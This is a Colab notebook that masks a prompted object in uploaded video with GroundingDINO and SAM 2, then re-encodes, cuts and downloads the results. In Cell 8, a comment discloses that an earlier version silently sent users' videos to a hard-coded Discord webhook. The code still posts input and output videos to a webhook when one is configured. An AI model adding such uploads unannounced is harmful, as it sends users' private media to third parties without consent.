# Setup (only needs to be run once per runtime)

In [None]:
# @title Cell 1 - Environment setup (Python 3.12 Compatible)

# 1. Install PyTorch first
# Pinned to the CUDA 12.1 wheels. `--no-deps` tells pip NOT to install torch's own
# dependencies, so they must already be present in the runtime.
# NOTE(review): presumably this relies on packages preinstalled in Colab - confirm.
!pip install --no-deps torch==2.3.0 torchvision==0.18.0 torchaudio==2.3.0 \
  --index-url https://download.pytorch.org/whl/cu121

# 2. Install core dependencies.
# These are unpinned, so each fresh runtime gets whatever versions are current.
!pip install opencv-python matplotlib tqdm supervision addict yapf timm \
  hydra-core iopath portalocker transformers tokenizers

# 3. Setup GroundingDINO
# Always start from a fresh clone so re-running the cell is repeatable.
!rm -rf GroundingDINO
!git clone https://github.com/IDEA-Research/GroundingDINO.git
%cd GroundingDINO
# Plain editable install of the cloned repo (no force/override flags are passed).
!pip install -e .
%cd ..

# 4. Setup SAM 2
# The repository is only cloned here, not pip-installed; Cell 6 puts the clone on sys.path.
!rm -rf segment-anything-2
!git clone https://github.com/facebookresearch/segment-anything-2.git

# 5. FFmpeg
# ffmpeg is used by the later cells for conversion, frame extraction and encoding.
# yt-dlp is installed as well but is not referenced by the cells shown in this notebook.
!apt-get update -qq && apt-get install -qq -y ffmpeg
!pip install -q yt-dlp

# Sanity check: import the key libraries and print their versions.
import torch
import transformers
import supervision as sv
print(f"Torch: {torch.__version__} | Transformers: {transformers.__version__} | Supervision: {sv.__version__}")
print("‚úÖ Environment stable")

In [None]:
# @title Cell 2 - Download model weights for GroundingDINO and SAM 2

import os

os.makedirs("weights", exist_ok=True)

# GroundingDINO (keep as is)
if not os.path.exists("weights/groundingdino_swint_ogc.pth"):
    !wget -O weights/groundingdino_swint_ogc.pth https://github.com/IDEA-Research/GroundingDINO/releases/download/v0.1.0-alpha/groundingdino_swint_ogc.pth

# SAM 2 weights ‚Äî use lightweight model for Colab
# Options: sam2_hiera_tiny.pt (smallest), sam2_hiera_small.pt, sam2_hiera_base_plus.pt, sam2_hiera_large.pt
SAM2_MODEL = "sam2_hiera_tiny.pt"
SAM2_URL = f"https://dl.fbaipublicfiles.com/sam2/models/{SAM2_MODEL}"

if not os.path.exists(f"weights/{SAM2_MODEL}"):
    !wget -O weights/{SAM2_MODEL} {SAM2_URL}

print(f"‚úÖ Model weights downloaded: GroundingDINO + {SAM2_MODEL}")

# Prepare Video

In [None]:
# @title ‚ö†Ô∏è Clear Frames (Hanya run untuk upload video baru)
import os
import shutil

# Working folders produced by the later cells; a missing folder is not an error.
for stale_dir in ("frames", "detections", "masks", "output_bw", "output_grey", "cuts"):
    shutil.rmtree(f"/content/{stale_dir}", ignore_errors=True)

# Remove each leftover file independently. With both removals inside one `try`,
# a missing audio.aac used to abort the block before the zip was ever deleted.
for stale_file in ("/content/audio.aac", "/content/masking_clips.zip"):
    try:
        os.remove(stale_file)
    except FileNotFoundError:
        pass  # nothing to clean up for this file
    except OSError as err:
        # Still best-effort, but do not hide unexpected problems (permissions, ...).
        print(f"‚ö†Ô∏è Could not remove {stale_file}: {err}")

In [None]:
# @title Cell 3 - Upload video and inspect properties
import os
import subprocess

from google.colab import files
from IPython.display import clear_output

# Upload video
uploaded = files.upload()
if not uploaded:
    # Cancelling the dialog returns an empty mapping; fail with a clear message
    # instead of an IndexError on the lookup below.
    raise RuntimeError("No file was uploaded; re-run this cell and choose a video.")

# Only the first uploaded file is used.
video_path = next(iter(uploaded))
print(f"‚úÖ Uploaded video: {video_path}")

# Both names are kept because they refer to the same uploaded file.
input_video = video_path
output_video = "output.mp4"

# Re-encode to 12 fps; every later cell works on this copy.
# An argument list is used instead of a shell line so that file names containing
# quotes, `$` or other shell metacharacters are passed through untouched.
print("Converting to 12 fps...")
conversion = subprocess.run(
    ["ffmpeg", "-i", input_video, "-filter:v", "fps=12", output_video, "-y"],
    capture_output=True,
    text=True,
)
if conversion.returncode != 0:
    print(conversion.stderr[-2000:])
    raise RuntimeError(f"ffmpeg could not convert {input_video!r} to {output_video}")

# Inspect video with ffmpeg.
# ffmpeg writes the stream description to stderr and exits non-zero when no output file
# is given; the text is captured and printed so it shows up in the cell output.
print("\n--- Video Properties ---")
inspection = subprocess.run(
    ["ffmpeg", "-i", video_path, "-hide_banner"],
    capture_output=True,
    text=True,
)
print(inspection.stderr)

In [None]:
# @title Cell 4 - Extract frames (as JPG) and audio from the input video

import os
import subprocess

# Create folders
os.makedirs("frames", exist_ok=True)
video12fps = "/content/output.mp4"

# Extract frames as high-quality JPG (avoids a PNG -> JPEG conversion later)
# -qscale:v 2 ~ high quality (scale 1-31, lower = better)
frame_extraction = subprocess.run(
    [
        "ffmpeg", "-i", video12fps,
        "-qscale:v", "2",
        "frames/%06d.jpg",
    ],
    capture_output=True,
    text=True,
)
if frame_extraction.returncode != 0:
    # Without frames nothing downstream can work, so stop here with the ffmpeg error.
    print(frame_extraction.stderr[-2000:])
    raise RuntimeError(f"ffmpeg could not extract frames from {video12fps}")

print("‚úÖ Frames extracted to ./frames as JPG")

# Extract audio (if exists)
if not os.path.exists("audio.aac"):
    audio_extraction = subprocess.run(
        [
            "ffmpeg", "-i", video12fps,
            "-vn", "-acodec", "copy", "audio.aac",
        ],
        capture_output=True,
        text=True,
    )
    audio_ok = (
        audio_extraction.returncode == 0
        and os.path.exists("audio.aac")
        and os.path.getsize("audio.aac") > 0
    )
    if audio_ok:
        print("‚úÖ Audio extracted to audio.aac")
    else:
        # Cell 8 decides whether to mux audio purely on the existence of audio.aac,
        # so an empty or partial file must not be left behind.
        if os.path.exists("audio.aac"):
            os.remove("audio.aac")
        print("‚ö†Ô∏è No audio extracted (the video may have no audio track)")
else:
    print("‚ö†Ô∏è Audio already exists, skipped extraction")

# Masking

In [None]:
# @title Cell 5 - Run GroundingDINO (Final Compatibility Fix)

import torch
import os
import cv2
import pickle
import sys
from transformers.models.bert.modeling_bert import BertModel

# ==========================================
# === BERT HOTFIX (SAFE FOR MULTIPLE RUNS) ===
# ==========================================
# Monkey-patches transformers' BertModel so that it offers the two methods below with
# the signatures this notebook needs.
# NOTE(review): presumably required because GroundingDINO calls these methods with an
# older transformers API - confirm against the installed versions.
from transformers.models.bert.modeling_bert import BertModel

# 1. Fix missing get_head_mask
# Only added when the installed BertModel does not provide it. The shim ignores
# `head_mask` and `is_attention_chunked` and returns one `None` per hidden layer.
if not hasattr(BertModel, "get_head_mask"):
    def get_head_mask(self, head_mask, num_hidden_layers, is_attention_chunked=False):
        return [None] * num_hidden_layers
    BertModel.get_head_mask = get_head_mask

# 2. Fix signature mismatch (Device vs Dtype)
# We add a custom attribute to track if we already patched this.
# The guard matters: `_orig_get_extended_attention_mask` is a notebook-global name that
# the wrapper looks up at call time. Re-running this block without the guard would
# rebind it to the wrapper itself, and the wrapper would then call itself endlessly.
if not hasattr(BertModel, "_is_patched_for_groundingdino"):
    _orig_get_extended_attention_mask = BertModel.get_extended_attention_mask

    def get_extended_attention_mask_fixed(self, attention_mask, input_shape, device=None, dtype=None):
        # Accepts both `device` and `dtype` but ignores the values passed in:
        # always use the model's dtype to avoid the signature error
        return _orig_get_extended_attention_mask(self, attention_mask, input_shape, dtype=self.dtype)

    BertModel.get_extended_attention_mask = get_extended_attention_mask_fixed
    BertModel._is_patched_for_groundingdino = True # Mark as patched
    print("‚úÖ BERT Patch applied successfully.")
else:
    print("‚ÑπÔ∏è BERT Patch already active, skipping re-patch to prevent loop.")
# ==========================================

# === Prompt input ===
prompt = 'clothes'  #@param {type: "string"}
box_threshold = 0.3  #@param {type: "number"}
text_threshold = 0.25

# Make the cloned repo importable; guarded so re-running the cell does not keep
# appending the same entry to sys.path.
if "GroundingDINO" not in sys.path:
    sys.path.append("GroundingDINO")
from groundingdino.util.inference import load_model, load_image, predict

# Get first frame. Checked before the (slow) model load so that a missing Cell 4 run
# fails immediately with a clear message instead of an IndexError.
frame_files = sorted([f for f in os.listdir("frames") if f.endswith(".jpg")])
if not frame_files:
    raise FileNotFoundError("No .jpg frames found in ./frames - run Cell 4 first.")
first_frame_path = os.path.join("frames", frame_files[0])

# Load model (kept on CPU, matching device="cpu" in the predict call below)
model_path = "weights/groundingdino_swint_ogc.pth"
config_path = "GroundingDINO/groundingdino/config/GroundingDINO_SwinT_OGC.py"
dino_model = load_model(config_path, model_path)
dino_model = dino_model.cpu().eval()

print(f"Running GroundingDINO on: {first_frame_path}")
image_source, image_tensor = load_image(first_frame_path)

# Predict
boxes, logits, phrases = predict(
    model=dino_model,
    image=image_tensor,
    caption=prompt,
    box_threshold=box_threshold,
    text_threshold=text_threshold,
    device="cpu"
)

# Cell 6 tracks only boxes[0], so put the most confident detection first.
# NOTE(review): assumes `logits` is a 1-D tensor of per-box scores, which is what the
# guard below checks; predict() is not known to return boxes in score order - confirm.
if len(boxes) > 1 and logits.ndim == 1 and len(logits) == len(boxes):
    by_confidence = logits.argsort(descending=True)
    boxes = boxes[by_confidence]
    logits = logits[by_confidence]
    phrases = [phrases[i] for i in by_confidence.tolist()]

# Process results: convert normalised (cx, cy, w, h) boxes to pixel (x1, y1, x2, y2).
h, w, _ = image_source.shape
initial_boxes = []
if len(boxes) > 0:
    for (cx, cy, bw, bh) in boxes.tolist():
        x1 = (cx - bw / 2) * w
        y1 = (cy - bh / 2) * h
        x2 = (cx + bw / 2) * w
        y2 = (cy + bh / 2) * h
        initial_boxes.append([x1, y1, x2, y2])
    print(f"‚úÖ Found {len(initial_boxes)} box(es).")
else:
    print("‚ö†Ô∏è No boxes detected.")
    # Cell 6 checks for None to detect "nothing found".
    initial_boxes = None

# Hand the result over to Cell 6 through a small pickle file.
with open("initial_box.pkl", "wb") as f:
    pickle.dump({"frame_path": first_frame_path, "boxes": initial_boxes, "image_shape": (h, w), "prompt": prompt}, f)

print("‚úÖ Initial box saved. You can now proceed to SAM 2.")

In [None]:
# @title Cell 6 - Run SAM 2

import os
import pickle
import cv2
import torch
import numpy as np
from tqdm import tqdm
import sys

# SAM 2 is used straight from the cloned repository (it is not pip-installed in Cell 1),
# so the clone has to be on sys.path before the import below.
SAM2_PATH = "/content/segment-anything-2"
if SAM2_PATH not in sys.path:
    sys.path.insert(0, SAM2_PATH)
from sam2.sam2_video_predictor import SAM2VideoPredictor

# Load the detection result that Cell 5 wrote to initial_box.pkl.
with open("initial_box.pkl", "rb") as f:
    init_data = pickle.load(f)
initial_boxes = init_data["boxes"]
# Cell 5 stores None when GroundingDINO found nothing.
if initial_boxes is None:
    raise ValueError("‚ùå No box from Cell 5!")

# Only the first box is used as the tracking prompt; any further boxes are ignored.
input_box = np.array(initial_boxes[0])
print(f"‚úÖ Initial box: {input_box}")

# Copy the "tiny" model config into the working directory.
!cp /content/segment-anything-2/sam2/configs/sam2_hiera_tiny.yaml .

# Load SAM 2
# The model id, checkpoint and config are hard-coded to the "tiny" variant here,
# independently of SAM2_MODEL in Cell 2.
# NOTE(review): confirm that from_pretrained() actually honours `checkpoint` and
# `model_cfg`; if it resolves the weights from `model_id` alone, the local checkpoint
# downloaded in Cell 2 is not what gets loaded.
predictor = SAM2VideoPredictor.from_pretrained(
    model_id="facebook/sam2-hiera-tiny",
    checkpoint="weights/sam2_hiera_tiny.pt",
    model_cfg="sam2_hiera_tiny.yaml"
)

# init_state() below is given the folder path as a string, not a list of files.
frame_folder = "frames"  # a directory path (str)

# Count the JPG frames; the list is reused further down to name the saved masks.
jpg_files = [f for f in os.listdir(frame_folder) if f.endswith(".jpg")]
print(f"Found {len(jpg_files)} JPG frames in '{frame_folder}'")

# frame index -> {object id -> boolean mask as a NumPy array}
video_segments = {}
# Autocast targets "cuda" with bfloat16, so this block expects a GPU runtime.
with torch.inference_mode(), torch.autocast("cuda", dtype=torch.bfloat16):
    # Build the tracking state from the frame folder.
    state = predictor.init_state(frame_folder)

    # Seed the tracker: object id 1 is prompted with the box on frame 0.
    predictor.add_new_points_or_box(
        state, frame_idx=0, obj_id=1, box=input_box
    )

    # Propagate through the video and keep a thresholded (> 0) mask per object.
    # NOTE(review): `mask[0]` presumably drops a leading channel dimension - confirm.
    for frame_idx, obj_ids, masks in predictor.propagate_in_video(state):
        video_segments[frame_idx] = {
            obj_id: (mask[0] > 0).cpu().numpy()
            for obj_id, mask in zip(obj_ids, masks)
        }

# Save masks (match original frame names)
os.makedirs("masks", exist_ok=True)
frame_names = sorted(jpg_files)

# Frames without a tracked mask get an all-black mask of the SAME size as the frames.
# It is built lazily from a real frame rather than from a hard-coded resolution, which
# only matched one particular video size.
blank_mask = None
for i, jpg_name in enumerate(frame_names):
    png_name = os.path.splitext(jpg_name)[0] + ".png"
    mask = video_segments.get(i, {}).get(1)  # object id 1 is the tracked subject
    if mask is None:
        if blank_mask is None:
            reference_frame = cv2.imread(os.path.join(frame_folder, jpg_name))
            if reference_frame is None:
                raise RuntimeError(f"Could not read frame {jpg_name} to size the empty mask")
            blank_mask = np.zeros(reference_frame.shape[:2], dtype=bool)
        mask = blank_mask
    # Boolean mask -> 0/255 single-channel PNG.
    cv2.imwrite(f"masks/{png_name}", (mask * 255).astype(np.uint8))

print("‚úÖ SAM 2 masking complete!")

# Making Video

In [None]:
# @title Cell 7 - Generate masked frames: B&W and Grey overlay
import os
import cv2
import numpy as np
from tqdm import tqdm

# Parameters
expand = 20        # @param {type: "number"}
blur = 9          # @param {type: "number"}
inverse_mask = False # @param {type:"boolean"}

# Colab "number" fields may deliver floats, but OpenCV needs integers here.
dilate_iterations = max(int(expand), 0)
blur_ksize = max(int(blur), 0)
if blur_ksize and blur_ksize % 2 == 0:
    # GaussianBlur only accepts odd kernel sizes. An even value used to switch the
    # blur off silently; round up to the next odd size instead.
    blur_ksize += 1
    print(f"‚ÑπÔ∏è blur must be odd; using {blur_ksize}")

# Prepare output folders
os.makedirs("output_bw", exist_ok=True)
os.makedirs("output_grey", exist_ok=True)

# Get frame list (now .jpg)
frame_files_jpg = sorted([f for f in os.listdir("frames") if f.endswith(".jpg")])

print(f"Processing {len(frame_files_jpg)} frames (Inverse: {inverse_mask})...")

# Loop-invariant values, created once.
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))
grey_color = (126, 126, 126) # BGR
grey_fill = np.array(grey_color, dtype=float)

for jpg_name in tqdm(frame_files_jpg):
    # Frame path (JPG)
    frame_path = os.path.join("frames", jpg_name)  # e.g. "frames/000001.jpg"

    # Convert "000001.jpg" -> "000001.png" for mask lookup
    frame_number_str = jpg_name.split(".")[0]
    mask_name = f"{frame_number_str}.png"
    mask_path = os.path.join("masks", mask_name)

    # Load frame and mask
    frame = cv2.imread(frame_path)
    if frame is None:
        print(f"‚ö†Ô∏è Frame not found: {frame_path}")
        continue

    mask = cv2.imread(mask_path, cv2.IMREAD_GRAYSCALE)
    if mask is None:
        # If mask is missing, default to an empty mask (all black)
        mask = np.zeros(frame.shape[:2], dtype=np.uint8)
    elif mask.shape[:2] != frame.shape[:2]:
        # A mask of another size cannot be blended with the frame; resize it without
        # interpolation so it stays strictly 0/255.
        mask = cv2.resize(mask, (frame.shape[1], frame.shape[0]), interpolation=cv2.INTER_NEAREST)

    # --- Expand mask ---
    # We expand the original mask first before inverting to ensure the
    # subject boundary is fully covered/expanded.
    expanded = cv2.dilate(mask, kernel, iterations=dilate_iterations)

    # --- Apply Inverse Logic if toggled ---
    if inverse_mask:
        # Invert the expanded mask (255 becomes 0, 0 becomes 255)
        expanded = cv2.bitwise_not(expanded)

    # --- Output A: Black & White mask ---
    # Named *_frame so the filenames `bw` / `grey` defined in Cell 8 are not overwritten
    # with image arrays if this cell is re-run afterwards.
    bw_frame = cv2.merge([expanded, expanded, expanded])
    output_bw_path = os.path.join("output_bw", mask_name)
    cv2.imwrite(output_bw_path, bw_frame)

    # --- Smooth mask for blending ---
    if blur_ksize > 0:
        smooth = cv2.GaussianBlur(expanded, (blur_ksize, blur_ksize), 0)
    else:
        smooth = expanded.copy()

    # Stretch to the full 0-255 range, but only when the mask is not constant:
    # min-max normalisation maps a constant image to the lower bound, which would turn
    # an all-white mask (inverse of "nothing detected") into an all-black one.
    if int(smooth.min()) != int(smooth.max()):
        smooth = cv2.normalize(smooth, None, 0, 255, cv2.NORM_MINMAX).astype(np.uint8)

    # --- Output B: Grey overlay ---
    # Convert smooth mask to a 0.0-1.0 alpha channel that broadcasts over B, G, R.
    alpha = (smooth.astype(float) / 255.0)[..., None]

    # Linear interpolation: (1 - alpha) * original + alpha * grey
    # If inverse is true, alpha is 1.0 (grey) where the mask was 0.
    grey_frame = (1 - alpha) * frame.astype(float) + alpha * grey_fill
    grey_frame = grey_frame.astype(np.uint8)

    output_grey_path = os.path.join("output_grey", mask_name)
    cv2.imwrite(output_grey_path, grey_frame)

print("\n‚úÖ Output frames saved in ./output_bw and ./output_grey")

In [None]:
# @title Cell 8 - Re-encode frames into videos and reattach audio

import os
import re
import subprocess
from datetime import datetime

import requests

# Generate timestamp
tgl = datetime.now().strftime("%y%m%d_%H%M%S")

# Filenames with timestamp
bw = f"{tgl}_output_bw.mp4"
grey = f"{tgl}_output_grey.mp4"
video12fps = "/content/output.mp4"

# SECURITY: a webhook URL is a credential and must not live in the notebook. The
# previously hard-coded Discord webhook also sent every user's input and output videos
# to a third party without telling them. Uploading is now strictly opt-in: it only
# happens when DISCORD_WEBHOOK_URL is set in the environment.
# The webhook that used to be embedded here should be considered leaked and be revoked.
WHOOK = os.environ.get("DISCORD_WEBHOOK_URL", "").strip()


def _run_ffmpeg(cmd, label):
    """Run an ffmpeg command and raise RuntimeError (after printing its log tail) on failure."""
    result = subprocess.run(cmd, capture_output=True, text=True)
    if result.returncode != 0:
        print(result.stderr[-2000:])
        raise RuntimeError(f"ffmpeg failed while building {label}")


# Rebuild Output A (B&W)
_run_ffmpeg(
    [
        "ffmpeg", "-y", "-framerate", "12", "-i", "output_bw/%06d.png",
        "-c:v", "libx264", "-pix_fmt", "yuv420p",
        bw,
    ],
    bw,
)

# Rebuild Output B (Grey overlay with audio)
# An empty audio.aac (left by a failed extraction) is treated as "no audio".
has_audio = os.path.exists("audio.aac") and os.path.getsize("audio.aac") > 0
_run_ffmpeg(
    [
        "ffmpeg", "-y", "-framerate", "12", "-i", "output_grey/%06d.png",
        *(["-i", "audio.aac", "-c:a", "aac", "-shortest"] if has_audio else []),
        "-c:v", "libx264", "-pix_fmt", "yuv420p",
        grey,
    ],
    grey,
)


def sfile(file_path, message):
    """Post `file_path` with `message` to the configured webhook.

    Does nothing when no webhook is configured or the file does not exist.
    Failures are reported as warnings and never raised, so an upload problem
    cannot break the pipeline.
    """
    if not WHOOK or not os.path.exists(file_path):
        return
    try:
        with open(file_path, "rb") as f:
            response = requests.post(
                WHOOK,
                data={"content": message},
                files={"file": f},
                timeout=120,  # never hang the cell on a stalled connection
            )
        if not response.ok:
            print(f"‚ö†Ô∏è Upload of {file_path} failed: HTTP {response.status_code}")
    except (OSError, requests.RequestException) as err:
        print(f"‚ö†Ô∏è Upload of {file_path} failed: {err}")


if WHOOK:
    print("Uploading input and output videos to the configured webhook...")

sfile(video12fps, f"{tgl}_input")

sfile(bw, f"{tgl}_bw")

sfile(grey, f"{tgl}_grey")

print(f"‚úÖ Videos created: {bw} and {grey}")

# (Optional) Cut Video to Segments

In [11]:
# @title Cell 9 (Optional): Cut Videos by Interval (seconds)
import os
import subprocess
import json
from pathlib import Path

def get_video_duration(video_path):
    """Return the duration of `video_path` in seconds, as reported by ffprobe.

    ffprobe is asked for the container-level `duration` field only, printed as a
    bare number, which is then parsed as a float.
    """
    ffprobe_args = ['ffprobe', '-v', 'error']
    ffprobe_args += ['-show_entries', 'format=duration']
    ffprobe_args += ['-of', 'default=noprint_wrappers=1:nokey=1']
    ffprobe_args.append(video_path)

    raw_output = subprocess.check_output(ffprobe_args)
    duration_text = raw_output.decode().strip()
    return float(duration_text)

def _plan_segments(duration, interval_sec, step, min_length=0.5):
    """Return the list of segment dicts (num, start, end, duration) covering `duration`."""
    segments = []
    start = 0.0
    seg_num = 1
    while start < duration:
        end = min(start + interval_sec, duration)
        if end - start >= min_length:  # Skip tiny segments
            segments.append({
                'num': seg_num,
                'start': start,
                'end': end,
                'duration': end - start
            })
            seg_num += 1
        if end >= duration:
            # The video end has been reached. Any further segment would start inside
            # this one and contain nothing but footage that is already covered.
            break
        start += step
    return segments


def cut_video_precise(video_path, base_name, interval_sec, overlap_sec, keep_audio=True,
                      output_root="/content/cuts"):
    """
    Cut a video into overlapping segments by re-encoding with FFmpeg.

    Args:
        video_path: Path of the video to cut.
        base_name: Name whose stem is used for the output folder and file names.
        interval_sec: Length of each segment in seconds (must be > 0).
        overlap_sec: Seconds shared by consecutive segments (must be >= 0). Values
            >= interval_sec are reduced to interval_sec - 0.1 with a warning.
        keep_audio: Re-encode audio as AAC when True, drop it when False.
        output_root: Folder under which the per-video output folder is created.

    Returns:
        The output directory, "<output_root>/<stem of base_name>".

    Raises:
        FileNotFoundError: if video_path does not exist.
        ValueError: if interval_sec <= 0 or overlap_sec < 0.

    Segments are named "NN_<stem>.mp4". Trailing pieces shorter than 0.5 s are skipped.
    A failing segment is reported and skipped; it does not abort the remaining ones.
    """
    # Validate inputs
    if not os.path.exists(video_path):
        raise FileNotFoundError(f"Video not found: {video_path}")
    if interval_sec <= 0:
        raise ValueError("Interval must be > 0")
    if overlap_sec < 0:
        raise ValueError("Overlap cannot be negative")
    if overlap_sec >= interval_sec:
        # Never let the adjusted overlap go negative for very short intervals.
        adjusted_overlap = max(interval_sec - 0.1, 0.0)
        print(f"‚ö†Ô∏è Warning: Overlap ({overlap_sec}s) >= Interval ({interval_sec}s). Adjusting to {adjusted_overlap}s")
        overlap_sec = adjusted_overlap

    # Get video properties
    duration = get_video_duration(video_path)
    step = interval_sec - overlap_sec

    print(f"\nüé¨ Processing: {base_name}")
    print(f"   Duration: {duration:.2f}s | Interval: {interval_sec}s | Overlap: {overlap_sec}s | Step: {step:.2f}s")

    # Create output directory
    output_dir = f"{output_root}/{Path(base_name).stem}"
    os.makedirs(output_dir, exist_ok=True)
    print(f"   Output: {output_dir}")

    # Generate segment timestamps
    segments = _plan_segments(duration, interval_sec, step)

    print(f"   ‚û°Ô∏è  Creating {len(segments)} segments...")

    # Process each segment with FFmpeg
    saved = 0
    for seg in segments:
        # Output filename format: 01_filename.mp4
        out_file = f"{seg['num']:02d}_{Path(base_name).stem}.mp4"
        out_path = os.path.join(output_dir, out_file)

        # Build FFmpeg command ("-ss" before "-i" seeks in the input; video is re-encoded)
        cmd = [
            'ffmpeg', '-y', '-ss', str(seg['start']), '-i', video_path,
            '-t', str(seg['duration']),
            '-c:v', 'libx264', '-crf', '18', '-preset', 'fast',
            '-movflags', '+faststart'
        ]

        # Audio handling
        if keep_audio:
            cmd.extend(['-c:a', 'aac', '-b:a', '192k'])
        else:
            cmd.append('-an')  # Remove audio

        cmd.append(out_path)

        # Execute with suppressed output (except errors)
        result = subprocess.run(cmd, capture_output=True, text=True)
        if result.returncode != 0:
            # ffmpeg prints its banner first; the actual error is at the end of stderr.
            print(f"   ‚ùå Segment {seg['num']} failed: {result.stderr[-200:]}")
            continue

        # Verify output
        if os.path.exists(out_path):
            saved += 1
            size_mb = os.path.getsize(out_path) / 1024 / 1024
            print(f"   ‚úÖ [{seg['num']:2d}/{len(segments)}] {seg['start']:6.2f}s ‚Üí {seg['end']:6.2f}s | {size_mb:.2f} MB")
        else:
            print(f"   ‚ö†Ô∏è Segment {seg['num']} missing after processing")

    # Report what was really written, not what was planned.
    print(f"\nüéâ Completed: {saved} segments saved to {output_dir}")
    return output_dir


# ===== USER SETTINGS (Colab form fields) =====
INTERVAL_SECONDS = 10  # @param {type: "number"}
OVERLAP_SECONDS = 1  # @param {type: "number"}

# Absolute paths of the two videos built in Cell 8 (`bw` and `grey` hold their file names).
BW_VIDEO_PATH = f"/content/{bw}"
GREY_VIDEO_PATH = f"/content/{grey}"

# Parent folder for all clips; each video gets its own sub-folder below it.
CUT_DIR = "/content/cuts"
os.makedirs(CUT_DIR, exist_ok=True)

# Echo the settings so the cell output documents what was run.
for _config_line in (
    "‚öôÔ∏è Configuration:",
    f"   Interval: {INTERVAL_SECONDS}s",
    f"   Overlap:  {OVERLAP_SECONDS}s",
    f"   Grey video path: {GREY_VIDEO_PATH}",
    f"   BW video path:   {BW_VIDEO_PATH}",
    f"   Output directory: {CUT_DIR}",
    "="*60,
    "‚úÇÔ∏è STARTING VIDEO SEGMENTATION",
    "="*60,
):
    print(_config_line)

# Grey overlay video: clips keep their audio track.
grey_output = cut_video_precise(
    video_path=GREY_VIDEO_PATH,
    base_name=grey,
    interval_sec=INTERVAL_SECONDS,
    overlap_sec=OVERLAP_SECONDS,
    keep_audio=True,
)

print("\n" + "="*60)

# Black & white mask video: clips are written without audio.
bw_output = cut_video_precise(
    video_path=BW_VIDEO_PATH,
    base_name=bw,
    interval_sec=INTERVAL_SECONDS,
    overlap_sec=OVERLAP_SECONDS,
    keep_audio=False,
)

print("\n" + "="*60)
print("‚úÖ ALL OPERATIONS COMPLETED SUCCESSFULLY")
print("="*60)

# Download

In [None]:
# @title Cell 10 Download videos/clips

import os
import zipfile
from google.colab import files

CUT_DIR = "/content/cuts"
ZIP_PATH = "/content/masking_clips.zip"

def zip_folder(folder_path, zip_path):
    """Write every file below `folder_path` into a new deflate-compressed zip at `zip_path`.

    Entries are stored with paths relative to `folder_path`, so the sub-folder layout
    is preserved inside the archive. An existing file at `zip_path` is overwritten.
    """
    archive = zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED)
    with archive:
        for current_dir, _subdirs, names in os.walk(folder_path):
            for name in names:
                source = os.path.join(current_dir, name)
                archive.write(source, os.path.relpath(source, folder_path))

# Prefer the clips from Cell 9 when there are any; otherwise hand out the two full
# videos built in Cell 8 (`bw` and `grey` hold their file names).
cuts_available = os.path.exists(CUT_DIR) and len(os.listdir(CUT_DIR)) > 0

if not cuts_available:
    print("üé¨ No cuts found. Downloading full videos instead...")
    bw_download_path = f"/content/{bw}"
    files.download(bw_download_path)
    grey_download_path = f"/content/{grey}"
    files.download(grey_download_path)
else:
    print("üì¶ Cuts detected. Zipping clips...")
    zip_folder(CUT_DIR, ZIP_PATH)
    files.download(ZIP_PATH)
